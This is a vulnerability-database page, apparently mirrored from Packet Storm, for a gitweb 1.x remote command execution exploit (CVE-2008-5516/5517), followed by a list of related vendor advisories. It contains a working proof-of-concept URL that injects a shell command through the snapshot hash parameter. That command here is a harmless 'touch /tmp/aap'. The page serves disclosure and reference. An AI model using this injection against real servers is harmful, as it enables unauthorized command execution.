Lucene search
S2 CrewPACKETSTORM:86450HistoryFeb 19, 2010 - 12:00 a.m.
gitWeb 1.x Remote Command Execution
2010-02-1900:00:00
S2 Crew
packetstormsecurity.com
16
0.347 Low
EPSS
Percentile
96.7%
`
# Exploit Title: gitWeb remote command execution
# Date: 2009.06.19
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: GIT 1.X
# Tested on: debian linux, GIT 1.5.2
# CVE: CVE-2008-5516 - CVE-2008-5517
# Code:
http://target/cgi-bin/gitweb2.cgi?p=workspace/.git;a=snapshot;f=.svn/prop-base/CHANGELOG.svn-base;h=7b57b302a4f016c8afdce6dc2df9e831460ccd82|`touch$IFS/tmp/aap`|;hb=10b50960665569a2e8b9588d60a66303c8e359f2
`
Related
debian
debian
[SECURITY] [DSA 1708-1] New Git packages fix remote code execution
2009-01-19 20:53:42
seebug
seebug
gitWeb 1.5.2 - Remote Command Execution
2014-07-01 00:00:00
gitWeb v1.5.2 Remote Command Execution
2010-02-19 00:00:00
exploitpack
exploitpack
gitWeb 1.5.2 - Remote Command Execution
2010-02-18 00:00:00
redhatcve
redhatcve
CVE-2008-5517
2019-10-04 20:55:05
CVE-2008-5516
2019-10-04 20:54:58
openvas
openvas
Debian Security Advisory DSA 1708-1 (git-core)
2009-01-20 00:00:00
Gentoo Security Advisory GLSA 200903-15 (git)
2009-03-13 00:00:00
Slackware Advisory SSA:2009-051-02 git
2012-09-11 00:00:00
exploitdb
exploitdb
gitWeb 1.5.2 - Remote Command Execution
2010-02-18 00:00:00
slackware
slackware
git
2009-02-20 17:06:57
nessus
nessus
GLSA-200903-15 : git: Multiple vulnerabilities
2009-03-10 00:00:00
Debian DSA-1708-1 : git-core - shell command injection
2009-01-20 00:00:00
Slackware 12.0 / 12.1 / 12.2 / current : git (SSA:2009-051-02)
2009-02-23 00:00:00
gentoo
gentoo
git: Multiple vulnerabilties
2009-03-09 00:00:00
osv
osv
git-core - remote code execution
2009-01-19 00:00:00
ubuntu
ubuntu
Git vulnerabilities
2009-02-18 00:00:00
prion
prion
Design/Logic Flaw
2009-01-20 16:30:00
Design/Logic Flaw
2009-01-13 17:00:00
cve
cve
CVE-2008-5516
2009-01-20 16:30:00
CVE-2008-5517
2009-01-13 17:00:00
ubuntucve
ubuntucve
CVE-2008-5516
2009-01-20 00:00:00
CVE-2008-5517
2009-01-13 00:00:00